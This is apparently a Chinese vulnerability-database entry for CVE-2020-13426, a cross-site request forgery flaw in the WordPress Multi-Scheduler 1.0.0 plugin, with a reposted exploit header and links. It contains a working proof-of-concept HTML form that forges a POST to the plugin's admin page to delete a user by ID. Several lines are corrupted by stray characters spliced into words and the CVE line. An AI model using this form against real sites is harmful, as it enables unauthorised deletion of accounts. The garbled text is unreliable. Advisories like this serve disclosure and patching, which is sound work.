WordPress Multi-Scheduler 跨站请求伪造漏洞

漏洞ID 2044245 漏洞类型 跨站请求伪造
发布时间 2020-05-30 更新时间 2020-06-23
CVE编号 CVE-2020-13426

CNNVD-ID CNNVD-202006-1548
漏洞平台 N/A CVSS评分 N/A
WordPress是WordPress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。Multi-Scheduler是使用在其中的一个调度器插件。
WordPress Multi-Scheduler 1.0.0版本中存在跨站请求伪造漏洞。该漏洞源于WEB应用未充分验证请求是否来自可信用户。攻击者可利用该漏洞通过受影响客户端向服务器发送非预期的请求。
# Exploit Title: WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)
# Google Dork: N/A
# Date: 2020-05-21
# Author Homepage: https://infayer.com/
# Exploit Author: UnD3sc0nn , / 7 V ~ U0c1d0
# Vendor Homepage: https://www.bdtask.com/
# Software Link: https://downloads.wordpress.org/plugin/multi-scheduler.1.0.0.zip
# Category: Web Application
# Version: 1.0.0
# Tested on: CentOS 7 / WordPress 5.4.1
## o 2 :  } t 5 . CVE : CVE-2020-13426
# 1. Technical Description:
The Multi-Scheduler plugin 1.0.0 for WordPress has a Cross-Site ReI k @  Rquest Forgery (CSRF) vulnerability
in the forms it presents, allowing the possibility of deleting records (users) when an ID is known.
# 2. PV P Q L : & ( ) xroof of Concept (PoC):
<form method="POST" action="http://[TARGET]/wp-admin/admin.php?page=msbdt_professional">
<input type="hidden" value="[ID]" name="pro_delete_id"><br>
<input type="hidden" value="Delete" name="professional_delete">
<input type="submit" value="Delete user">
</html>
来源:MISC

链接:https://packetstormsecurity.com/files/157867/WordPress-Multi-Scheduler-1.0.0-Cross-Site-Request-Forgery.html


链接:https://research-labs.net/search/exploits/wordpress-plugin-multi-scheduler-100-cross-site-request-forgery-delete-user


链接:https://0day.today/exploit/34496


链接:h ? x 3 : 3 Z https://nvd.nist.gov/vuln/detail/CVE-2020-13426